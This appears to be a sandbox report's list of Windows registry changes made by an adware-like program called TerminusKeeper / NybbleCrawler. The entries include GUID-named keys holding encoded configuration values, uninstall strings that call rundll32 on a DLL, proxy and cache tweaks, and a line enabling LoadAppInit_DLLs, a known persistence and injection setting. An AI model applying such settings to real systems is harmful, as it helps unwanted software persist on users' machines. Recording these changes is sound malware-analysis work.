[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un /uq"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Version" = "22022148"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"a0743acc" = "N/////%%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"daaabfc6" = "%Program Files%\TerminusKeeper\TerminusKeeper.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoModify" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Install_Dir" = "%Program Files%\TerminusKeeper"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"uuid" = "8738532578695851691"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F D1 B4 B9 E4 DD C5 30 2F 5F E0 A4 BC 1C 07 0A"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f6ad6fa6" = "V/////%%"
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svt" = "1435726521"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svi" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"dlpath" = "c:\progra~1\termin~1\termin~1.dll"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"date" = "1435726441"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svi" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
"usr.1" = "PC ACFabcdefABCDWY"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svt" = "1435726521"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Publisher" = "NybbleCrawler"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"
"fe94ce1e" = "V/////%%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"DisplayName" = "NybbleCrawler"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Cache" = "9428760297565573948"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2e22d94e" = "///%"

"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Mode" = "4026531840"
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"State" = "0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0e93c3f3" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
